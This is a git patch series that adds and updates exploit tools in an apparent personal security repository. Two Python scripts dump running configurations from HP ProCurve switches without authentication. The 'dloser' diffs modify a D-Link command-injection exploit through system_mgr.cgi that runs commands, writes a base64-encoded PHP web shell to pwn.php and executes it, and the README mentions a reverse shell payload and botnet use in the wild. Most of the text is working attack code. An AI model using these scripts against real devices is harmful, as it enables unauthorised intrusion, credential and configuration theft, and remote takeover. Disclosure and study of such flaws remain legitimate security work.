From 68d71a249c7af5cd666de39022f8f09199a32cdd Mon Sep 17 00:00:00 2001 From: David Davidson Date: Mon, 11 Feb 2019 10:11:50 +0100 Subject: [PATCH 1/7] Create README.md --- procurvy/README.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 procurvy/README.md diff --git a/procurvy/README.md b/procurvy/README.md new file mode 100644 index 0000000..af44690 --- /dev/null +++ b/procurvy/README.md @@ -0,0 +1,4 @@ +## HP Procurve Switch Config Disclosure + +Found these when cleaning up some old files over the weekend, there are two scripts. Both of them dump configs from certain HP Procurve switches. I don't have the notes associated with them any more, but I know they were disclosed to HP at some point. + From 466cbe2773f65f1da3265cbe132618147e2d0f79 Mon Sep 17 00:00:00 2001 From: David Davidson Date: Mon, 11 Feb 2019 10:12:37 +0100 Subject: [PATCH 2/7] Create leak_config_hr.py --- procurvy/leak_config_hr.py | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 procurvy/leak_config_hr.py diff --git a/procurvy/leak_config_hr.py b/procurvy/leak_config_hr.py new file mode 100644 index 0000000..a9e75b4 --- /dev/null +++ b/procurvy/leak_config_hr.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python +from __future__ import print_function +import sys +import requests +import urlparse + +def main(args): + for host in args: + if host[:4] != 'http': + host = 'http://' + host + if host[-1] != '/': + host = host + '/' + print(host) + sess = requests.Session() + resp = sess.get(host) + if resp.status_code == 200 and 'nhome.html' in resp.text: + resp = sess.get(host + 'html/trbl_confReportTxt.html') + if 'Running configuration' in resp.text: + domain = host.split('/')[2] + print("SUCCESS for", domain) + + with open(domain + ".config.txt", "w") as handle: + handle.write(resp.text) + +if __name__ == "__main__": + main(sys.argv[1:]) From bb7f6b7e180cfc44fd84d8d2038a5e4639b51372 Mon Sep 17 00:00:00 2001 From: David Davidson Date: Mon, 11 Feb 2019 10:13:06 +0100 Subject: [PATCH 3/7] Create leak_config_dm.py --- procurvy/leak_config_dm.py | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 procurvy/leak_config_dm.py diff --git a/procurvy/leak_config_dm.py b/procurvy/leak_config_dm.py new file mode 100644 index 0000000..4e29dee --- /dev/null +++ b/procurvy/leak_config_dm.py @@ -0,0 +1,33 @@ +#!/usr/bin/python2 +# coding: utf-8 +import requests +import sys +import re + +def log_config(ip, config): + logfile = "out/%s-config.ppc" %(ip) + f = open(logfile, "wb") + f.write(config) + f.close() + +def dump_config(target): + ip = re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', target).group() + print "{+} Dumping config from %s" %(ip) + url = "%s/html/json.html?method:downloadConfigFileToPC&name=config" %(target) + try: + r = requests.get(url, verify=False) + except: + sys.exit("{-} Dump failed...") + if "Config" in r.text: + log_config(ip=ip, config=r.text) + print "{+} Dumped config to out/%s-config.ppc" %(ip) + else: + sys.exit("{-} Dump failed...") + +def main(args): + if len(args) != 2: + sys.exit("use: %s http://1.1.1.1:80" %(args[0])) + dump_config(target=args[1]) + +if __name__ == "__main__": + main(args=sys.argv) From 9f74cb045e8a142816455c7af42ac0818161c32c Mon Sep 17 00:00:00 2001 From: David Davidson Date: Mon, 11 Feb 2019 10:13:59 +0100 Subject: [PATCH 4/7] Update README.md --- procurvy/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/procurvy/README.md b/procurvy/README.md index af44690..6830937 100644 --- a/procurvy/README.md +++ b/procurvy/README.md @@ -2,3 +2,4 @@ Found these when cleaning up some old files over the weekend, there are two scripts. Both of them dump configs from certain HP Procurve switches. I don't have the notes associated with them any more, but I know they were disclosed to HP at some point. +Both of them use seemingly different ways to leak the config without authentication, again, I don't have the notes for these. From 705e5800617d3cd6e19cc55cb8afe72bcd57f88d Mon Sep 17 00:00:00 2001 From: David Davidson Date: Thu, 7 May 2020 21:14:05 +0200 Subject: [PATCH 5/7] Fix requests usage for users, remove proxy. --- dloser/dloser.py | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/dloser/dloser.py b/dloser/dloser.py index 0d2778c..f3de1ca 100644 --- a/dloser/dloser.py +++ b/dloser/dloser.py @@ -1,6 +1,6 @@ #!/usr/bin/python2 # coding: utf-8 -import requesocks +import requests import sys red = "\x1b[1;31m" @@ -12,8 +12,6 @@ white = "\x1b[1;37m" clear = "\x1b[0m" -proxies = {'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'} - def banner(): print """ %s██████╗ ██╗ ██████╗ ███████╗███████╗██████╗ %s @@ -29,7 +27,7 @@ def banner_grab(target): sys.stdout.write("%s{*} Checking target fingerprint...%s" %(blue, clear)) sys.stdout.flush() try: - r = requesocks.head(url=target, proxies=proxies, verify=False) + r = requests.head(url=target, verify=False) except Exception, e: sys.stdout.write(" %s[failed]%s\n" %(red, clear)) sys.exit(0) @@ -44,7 +42,7 @@ def check_cgi(target): sys.stdout.write("%s{*} Checking for /cgi-bin/system_mgr.cgi...%s" %(blue, clear)) sys.stdout.flush() try: - r = requesocks.head(url=url, proxies=proxies, verify=False) + r = requests.head(url=url, verify=False) except Exception, e: sys.stdout.write(" %s[failed]\n%s" %(red, clear)) sys.exit(0) @@ -59,7 +57,7 @@ def check_0day(target): sys.stdout.flush() url = target + "/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=id;" try: - r = requesocks.get(url=url, proxies=proxies, verify=False) + r = requests.get(url=url, verify=False) except Exception, e: sys.stdout.write(" %s[failed]\n%s" %(red, clear)) sys.exit(0) @@ -77,7 +75,7 @@ def execute_command(target, command): command = command.replace(' ', '%20') url = target + "/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=%s" %(command) try: - r = requesocks.get(url=url, proxies=proxies, verify=False) + r = requests.get(url=url, verify=False) except Exception, e: sys.exit("%s{-} Exception hit! Printing stack trace...\n%s%s" %(red, str(e), clear)) output = r.text.replace("Content-type: text/html", "") @@ -106,7 +104,7 @@ def upload_shell(target): upload = execute_command(target, command="echo -ne '%s'>/var/www/ajaxplorer/plugins/access.remote_fs/pwn.php" %(payload)) check_shell(target) -def encode_php(phpcode): #base64 that shit niqqa! +def encode_php(phpcode): phpcode = phpcode.encode('base64') phpcode = phpcode.replace("\n", "") phpcode = phpcode.strip() @@ -117,7 +115,7 @@ def execute_php(target, php): postdata = {'woot': php} url = target + '/ajaxplorer/plugins/access.remote_fs/pwn.php' try: - execute = requesocks.post(url=url, data=postdata, proxies=proxies, verify=False, allow_redirects=False) + execute = requests.post(url=url, data=postdata, verify=False, allow_redirects=False) except Exception, e: sys.exit("%s{-} Something went horribly wrong. Bailing!\n%s%s" %(red, str(e), clear)) output = execute.text.rstrip() From 64740593d8255eca49aeee8474852bcf9e18a3e2 Mon Sep 17 00:00:00 2001 From: David Davidson Date: Thu, 7 May 2020 21:19:43 +0200 Subject: [PATCH 6/7] Update README.md --- dloser/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/dloser/README.md b/dloser/README.md index 5791012..d48d795 100644 --- a/dloser/README.md +++ b/dloser/README.md @@ -4,3 +4,8 @@ Old exploit I found on one of my old boxes that I put together for a demo. Bug w This exploit has been shared around a fair bit in the past, and probably has seen some actual in the wild use, so figured it was time to kill it dead. "callback.php" is the PentestMonkey reverse shell, stripped of some bits and such so that it works reliably. I can't find it currently but will upload it later. You are welcome to supply your own backconnect payload and alter the exploit appropriately. + +Notes: +Originally committed in 2017 to this repo, some minor fixes in 2020 on a whim (replaced "requesocks" with "requests", removed Tor dependency). +Bug was found... Sometime around 2013 or so? Maybe a bit earlier? I can't be sure. Turns out theres a bug collission and someone else had also found it in 2012! - http://roberto.greyhats.it/advisories/20120208-dlink-rce.txt +Bug seems to have been used ITW to create a botnet by some weaboo - https://www.zdnet.com/article/for-8-years-a-hacker-operated-a-massive-iot-botnet-just-to-download-anime-videos/ From 44bf14da73220467410c2d952c33638281c47954 Mon Sep 17 00:00:00 2001 From: David Davidson Date: Thu, 7 May 2020 21:20:14 +0200 Subject: [PATCH 7/7] Update README.md --- dloser/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dloser/README.md b/dloser/README.md index d48d795..d0277d2 100644 --- a/dloser/README.md +++ b/dloser/README.md @@ -6,6 +6,6 @@ This exploit has been shared around a fair bit in the past, and probably has see "callback.php" is the PentestMonkey reverse shell, stripped of some bits and such so that it works reliably. I can't find it currently but will upload it later. You are welcome to supply your own backconnect payload and alter the exploit appropriately. Notes: -Originally committed in 2017 to this repo, some minor fixes in 2020 on a whim (replaced "requesocks" with "requests", removed Tor dependency). +Originally committed in 2017 to this repo, some minor fixes in 2020 on a whim (replaced "requesocks" with "requests", removed Tor dependency). Had originally spoken publicly about this bug at SteelCon in 2015, but forgot to release the code at the time. Bug was found... Sometime around 2013 or so? Maybe a bit earlier? I can't be sure. Turns out theres a bug collission and someone else had also found it in 2012! - http://roberto.greyhats.it/advisories/20120208-dlink-rce.txt Bug seems to have been used ITW to create a botnet by some weaboo - https://www.zdnet.com/article/for-8-years-a-hacker-operated-a-massive-iot-botnet-just-to-download-anime-videos/